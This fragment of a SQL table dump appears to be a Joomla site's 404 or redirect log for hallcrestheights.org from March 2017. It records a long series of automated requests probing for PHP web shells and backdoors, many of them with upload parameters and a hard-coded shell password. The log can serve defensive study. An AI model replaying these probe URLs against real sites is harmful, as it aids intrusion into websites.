00:00:00'),(6858,'http://hallcrestheights.org/wp-content/plugins/myshe.php?z3=UWppVGpMLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-03 04:10:03','0000-00-00 00:00:00'),(6859,'http://hallcrestheights.org/wp-content/plugins/wp-cache.php?z3=UWppVGpMLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-03 04:10:50','0000-00-00 00:00:00'),(6860,'http://hallcrestheights.org/wp-content/plugins/wp-footers.php?z3=UWppVGpMLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-03 04:12:18','0000-00-00 00:00:00'),(6861,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=UWppVGpMLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',3,0,'2017-03-03 04:13:18','0000-00-00 00:00:00'),(6862,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=UWppVGpMLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-03 04:14:33','0000-00-00 00:00:00'),(6863,'http://hallcrestheights.org/wp-content/plugins/SocketIontrol.php?z3=UWppVGpMLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-03 04:15:38','0000-00-00 00:00:00'),(6864,'http://hallcrestheights.org/wp-content/plugins/SocketIasrgasfontrol.php?z3=UWppVGpMLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-03 04:16:39','0000-00-00 00:00:00'),(6865,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=UWppVGpMLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-03 04:19:11','0000-00-00 00:00:00'),(6866,'http://hallcrestheights.org/head.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 04:21:38','0000-00-00 00:00:00'),(6867,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=UWppVGpMLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-03 04:23:44','0000-00-00 00:00:00'),(6868,'http://hallcrestheights.org/cache/list.php?z3=UWppVGpMLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 04:24:07','0000-00-00 00:00:00'),(6869,'http://hallcrestheights.org/images/interface.php?z3=UWppVGpMLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-03 04:24:49','0000-00-00 00:00:00'),(6870,'http://hallcrestheights.org/sqldebug.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 04:25:28','0000-00-00 00:00:00'),(6871,'http://hallcrestheights.org/xmlrpc-activate.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 04:26:19','0000-00-00 00:00:00'),(6872,'http://hallcrestheights.org/keep.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 04:28:46','0000-00-00 00:00:00'),(6873,'http://hallcrestheights.org/tmpos.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 04:29:41','0000-00-00 00:00:00'),(6874,'http://hallcrestheights.org/link.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 04:30:44','0000-00-00 00:00:00'),(6875,'http://hallcrestheights.org/dcodzu.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-03 04:33:13','0000-00-00 00:00:00'),(6876,'http://hallcrestheights.org/codd.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 04:33:40','0000-00-00 00:00:00'),(6877,'http://hallcrestheights.org/cache/wcache7675n.PHP?z3=UWppVGpMLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 04:34:32','0000-00-00 00:00:00'),(6878,'http://hallcrestheights.org/modules/mod_bookmark/helper.php?z3=UWppVGpMLnBocA==&z4=L21vZHVsZXMvbW9kX2Jvb2ttYXJrLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 04:35:24','0000-00-00 00:00:00'),(6879,'http://hallcrestheights.org/content.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 04:36:41','0000-00-00 00:00:00'),(6880,'http://hallcrestheights.org/wp-content/plugins/sfn.php?z3=UWppVGpMLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-03 04:37:29','0000-00-00 00:00:00'),(6881,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=UWppVGpMLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-03 04:38:35','0000-00-00 00:00:00'),(6882,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=UWppVGpMLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-03 04:39:33','0000-00-00 00:00:00'),(6883,'http://hallcrestheights.org/shootmei.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 04:40:18','0000-00-00 00:00:00'),(6884,'http://hallcrestheights.org/dcodqg.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-03 04:41:04','0000-00-00 00:00:00'),(6885,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/udd.php',NULL,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/udd.php','',44,0,'2017-03-03 04:42:02','0000-00-00 00:00:00'),(6886,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/QjiTjL.php',NULL,'','',1,0,'2017-03-03 04:42:22','0000-00-00 00:00:00'),(6887,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/QjiTjL.php',NULL,'','',1,0,'2017-03-03 04:43:20','0000-00-00 00:00:00'),(6888,'http://hallcrestheights.org/wp-content/uploads/QjiTjL.php',NULL,'','',1,0,'2017-03-03 04:43:54','0000-00-00 00:00:00'),(6889,'http://hallcrestheights.org/QjiTjL.php',NULL,'','',1,0,'2017-03-03 04:44:29','0000-00-00 00:00:00'),(6890,'http://hallcrestheights.org/sites/all/libraries/elfinder/files/QjiTjL.php',NULL,'','',1,0,'2017-03-03 04:45:09','0000-00-00 00:00:00'),(6891,'http://hallcrestheights.org/tmp/sfx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',7,0,'2017-03-03 04:45:55','0000-00-00 00:00:00'),(6892,'http://hallcrestheights.org/up.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',9,0,'2017-03-03 04:46:28','0000-00-00 00:00:00'),(6893,'http://hallcrestheights.org/media/jmail.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',25,0,'2017-03-03 04:46:52','0000-00-00 00:00:00'),(6894,'http://hallcrestheights.org/media/jmails.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',25,0,'2017-03-03 04:47:21','0000-00-00 00:00:00'),(6895,'http://hallcrestheights.org/libraries/joomla/juser.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',26,0,'2017-03-03 04:47:31','0000-00-00 00:00:00'),(6896,'http://hallcrestheights.org/libraries/joomla/jmail.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',8,0,'2017-03-03 04:47:47','0000-00-00 00:00:00'),(6897,'http://hallcrestheights.org/libraries/joomla/jmails.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',7,0,'2017-03-03 04:48:16','0000-00-00 00:00:00'),(6898,'http://hallcrestheights.org/tmp/guide.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',25,0,'2017-03-03 04:49:48','0000-00-00 00:00:00'),(6899,'http://hallcrestheights.org/media/jss.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-03-03 04:50:13','0000-00-00 00:00:00'),(6900,'http://hallcrestheights.org/media/css.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',26,0,'2017-03-03 04:50:41','0000-00-00 00:00:00'),(6901,'http://hallcrestheights.org/css.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',7,0,'2017-03-03 04:51:00','0000-00-00 00:00:00'),(6902,'http://hallcrestheights.org/f.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',7,0,'2017-03-03 04:51:50','0000-00-00 00:00:00'),(6903,'http://hallcrestheights.org/zibi.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',7,0,'2017-03-03 04:52:42','0000-00-00 00:00:00'),(6904,'http://hallcrestheights.org/ws0.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',9,0,'2017-03-03 04:53:07','0000-00-00 00:00:00'),(6905,'http://hallcrestheights.org/wso.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',7,0,'2017-03-03 04:53:27','0000-00-00 00:00:00'),(6906,'http://hallcrestheights.org/m.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',7,0,'2017-03-03 04:54:13','0000-00-00 00:00:00'),(6907,'http://hallcrestheights.org/ny.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-03-03 04:54:43','0000-00-00 00:00:00'),(6908,'http://hallcrestheights.org/libraries/joomla/web.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',7,0,'2017-03-03 04:55:10','0000-00-00 00:00:00'),(6909,'http://hallcrestheights.org/lou-bna.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-03-03 04:55:34','0000-00-00 00:00:00'),(6910,'http://hallcrestheights.org/active.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-03-03 04:55:53','0000-00-00 00:00:00'),(6911,'http://hallcrestheights.org/ku.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',12,0,'2017-03-03 04:56:18','0000-00-00 00:00:00'),(6912,'http://hallcrestheights.org/mide.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-03-03 04:56:35','0000-00-00 00:00:00'),(6913,'http://hallcrestheights.org/popup-pomo.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',9,0,'2017-03-03 04:56:57','0000-00-00 00:00:00'),(6914,'http://hallcrestheights.org/wp-content/upgrade/theme-compat/popup-pomo.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',21,0,'2017-03-03 04:57:15','0000-00-00 00:00:00'),(6915,'http://hallcrestheights.org/wp-includes/upgrade/theme-compat/popup-pomo.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-03-03 04:57:36','0000-00-00 00:00:00'),(6916,'http://hallcrestheights.org/images/stories/alfa.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-03-03 04:57:49','0000-00-00 00:00:00'),(6917,'http://hallcrestheights.org/logo_img.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',12,0,'2017-03-03 04:58:21','0000-00-00 00:00:00'),(6918,'http://hallcrestheights.org/images/p.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-03-03 04:58:32','0000-00-00 00:00:00'),(6919,'http://hallcrestheights.org/zeubda.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',12,0,'2017-03-03 04:58:44','0000-00-00 00:00:00'),(6920,'http://hallcrestheights.org/images/clean.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-03-03 04:58:58','0000-00-00 00:00:00'),(6921,'http://hallcrestheights.org/help.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',7,0,'2017-03-03 04:59:03','0000-00-00 00:00:00'),(6922,'http://hallcrestheights.org/libraries/joomla/zipy.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-03-03 04:59:17','0000-00-00 00:00:00'),(6923,'http://hallcrestheights.org/tmp/pz.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',9,0,'2017-03-03 04:59:26','0000-00-00 00:00:00'),(6924,'http://hallcrestheights.org/go.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',7,0,'2017-03-03 04:59:47','0000-00-00 00:00:00'),(6925,'http://hallcrestheights.org/te.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',7,0,'2017-03-03 04:59:59','0000-00-00 00:00:00'),(6926,'http://hallcrestheights.org/images/stories/s.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-03-03 05:00:14','0000-00-00 00:00:00'),(6927,'http://hallcrestheights.org/images/stories/black.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',22,0,'2017-03-03 05:00:23','0000-00-00 00:00:00'),(6928,'http://hallcrestheights.org/libraries/joomla/go.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',7,0,'2017-03-03 05:00:38','0000-00-00 00:00:00'),(6929,'http://hallcrestheights.org/wp-configuration.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',25,0,'2017-03-03 05:00:58','0000-00-00 00:00:00'),(6930,'http://hallcrestheights.org/images/stories/3xp.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',26,0,'2017-03-03 05:01:13','0000-00-00 00:00:00'),(6931,'http://hallcrestheights.org/images/stories/xsamxadoo.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',26,0,'2017-03-03 05:01:46','0000-00-00 00:00:00'),(6932,'http://hallcrestheights.org/tmp/petx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-03-03 05:02:03','0000-00-00 00:00:00'),(6933,'http://hallcrestheights.org/tmp/bogel.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-03-03 05:02:22','0000-00-00 00:00:00'),(6934,'http://hallcrestheights.org/images/stories/0d4y.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-03-03 05:02:31','0000-00-00 00:00:00'),(6935,'http://hallcrestheights.org/libraries/joomla/wso.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',22,0,'2017-03-03 05:02:47','0000-00-00 00:00:00'),(6936,'http://hallcrestheights.org/media/wso.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',12,0,'2017-03-03 05:02:59','0000-00-00 00:00:00'),(6937,'http://hallcrestheights.org/cache/clean.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',26,0,'2017-03-03 05:03:17','0000-00-00 00:00:00'),(6938,'http://hallcrestheights.org/images/stories/a.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-03-03 05:03:26','0000-00-00 00:00:00'),(6939,'http://hallcrestheights.org/images/stories/shell.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-03-03 05:03:32','0000-00-00 00:00:00'),(6940,'http://hallcrestheights.org/shell.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',7,0,'2017-03-03 05:03:47','0000-00-00 00:00:00'),(6941,'http://hallcrestheights.org/info.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',9,0,'2017-03-03 05:04:06','0000-00-00 00:00:00'),(6942,'http://hallcrestheights.org/images/stories/filemga.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',25,0,'2017-03-03 05:04:22','0000-00-00 00:00:00'),(6943,'http://hallcrestheights.org/images/stories/0day.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',25,0,'2017-03-03 05:04:38','0000-00-00 00:00:00'),(6944,'http://hallcrestheights.org/images/w0rm.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-03-03 05:04:45','0000-00-00 00:00:00'),(6945,'http://hallcrestheights.org/images/wp-mail.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-03-03 05:04:54','0000-00-00 00:00:00'),(6946,'http://hallcrestheights.org/images/upa.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',22,0,'2017-03-03 05:04:59','0000-00-00 00:00:00'),(6947,'http://hallcrestheights.org/libraries/respectMuslims.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',26,0,'2017-03-03 05:05:04','0000-00-00 00:00:00'),(6948,'http://hallcrestheights.org/b1.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-03-03 05:05:12','0000-00-00 00:00:00'),(6949,'http://hallcrestheights.org/images/stories/u.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',22,0,'2017-03-03 05:05:15','0000-00-00 00:00:00'),(6950,'http://hallcrestheights.org/images/stories/ali.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',22,0,'2017-03-03 05:05:25','0000-00-00 00:00:00'),(6951,'http://hallcrestheights.org/hh.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',7,0,'2017-03-03 05:05:35','0000-00-00 00:00:00'),(6952,'http://hallcrestheights.org/tmp/upxx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-03-03 05:05:53','0000-00-00 00:00:00'),(6953,'http://hallcrestheights.org/images/stories/c00d.php',NULL,'','',39,0,'2017-03-03 05:06:07','0000-00-00 00:00:00'),(6954,'http://hallcrestheights.org/images/upxx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',21,0,'2017-03-03 05:06:19','0000-00-00 00:00:00'),(6955,'http://hallcrestheights.org/xup.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',9,0,'2017-03-03 05:06:40','0000-00-00 00:00:00'),(6956,'http://hallcrestheights.org/Jijle3.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-03-03 05:06:58','0000-00-00 00:00:00'),(6957,'http://hallcrestheights.org/images/stories/shewil!.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',11,0,'2017-03-03 05:07:06','0000-00-00 00:00:00'),(6958,'http://hallcrestheights.org/up14.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-03-03 05:07:15','0000-00-00 00:00:00'),(6959,'http://hallcrestheights.org/images/stories/gass.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',22,0,'2017-03-03 05:07:34','0000-00-00 00:00:00'),(6960,'http://hallcrestheights.org/wp-installation.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',26,0,'2017-03-03 05:07:48','0000-00-00 00:00:00'),(6961,'http://hallcrestheights.org/media/mass.php',NULL,'','',23,0,'2017-03-03 05:08:00','0000-00-00 00:00:00'),(6962,'http://hallcrestheights.org/sh-2017.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',7,0,'2017-03-03 05:08:18','0000-00-00 00:00:00'),(6963,'http://hallcrestheights.org/images/stories/webroot.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-03-03 05:08:50','0000-00-00 00:00:00'),(6964,'http://hallcrestheights.org/default_component.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',22,0,'2017-03-03 05:09:01','0000-00-00 00:00:00'),(6965,'http://hallcrestheights.org/auithorze.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-03-03 05:09:11','0000-00-00 00:00:00'),(6966,'http://hallcrestheights.org/cache/asdf.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',22,0,'2017-03-03 05:09:22','0000-00-00 00:00:00'),(6967,'http://hallcrestheights.org/E.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',25,0,'2017-03-03 05:09:32','0000-00-00 00:00:00'),(6968,'http://hallcrestheights.org/bin/logo_img.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',19,0,'2017-03-03 05:09:36','0000-00-00 00:00:00'),(6969,'http://hallcrestheights.org/reasdme.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',22,0,'2017-03-03 05:09:47','0000-00-00 00:00:00'),(6970,'http://hallcrestheights.org/images/sym.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-03-03 05:09:59','0000-00-00 00:00:00'),(6971,'http://hallcrestheights.org/zebda.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',7,0,'2017-03-03 05:10:09','0000-00-00 00:00:00'),(6972,'http://hallcrestheights.org/kk.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',7,0,'2017-03-03 05:10:23','0000-00-00 00:00:00'),(6973,'http://hallcrestheights.org/wp_logns.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',22,0,'2017-03-03 05:10:33','0000-00-00 00:00:00'),(6974,'http://hallcrestheights.org/cv.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',9,0,'2017-03-03 05:10:43','0000-00-00 00:00:00'),(6975,'http://hallcrestheights.org/u.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',9,0,'2017-03-03 05:10:55','0000-00-00 00:00:00'),(6976,'http://hallcrestheights.org/setting.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',7,0,'2017-03-03 05:11:00','0000-00-00 00:00:00'),(6977,'http://hallcrestheights.org/tmp/setting.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-03-03 05:11:06','0000-00-00 00:00:00'),(6978,'http://hallcrestheights.org/images/stories/readme.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',22,0,'2017-03-03 05:11:14','0000-00-00 00:00:00'),(6979,'http://www.hallcrestheights.org/i20162634-lugd-ltrsmxx-k1112-hypzq-jllzoh-njumnte-cwfogywb.htm',NULL,'https://www.google.co.jp/','',5,0,'2017-03-03 16:15:55','0000-00-00 00:00:00'),(6980,'http://hallcrestheights.org/sqlbak.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 03:54:35','0000-00-00 00:00:00'),(6981,'http://hallcrestheights.org/sql-bak.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 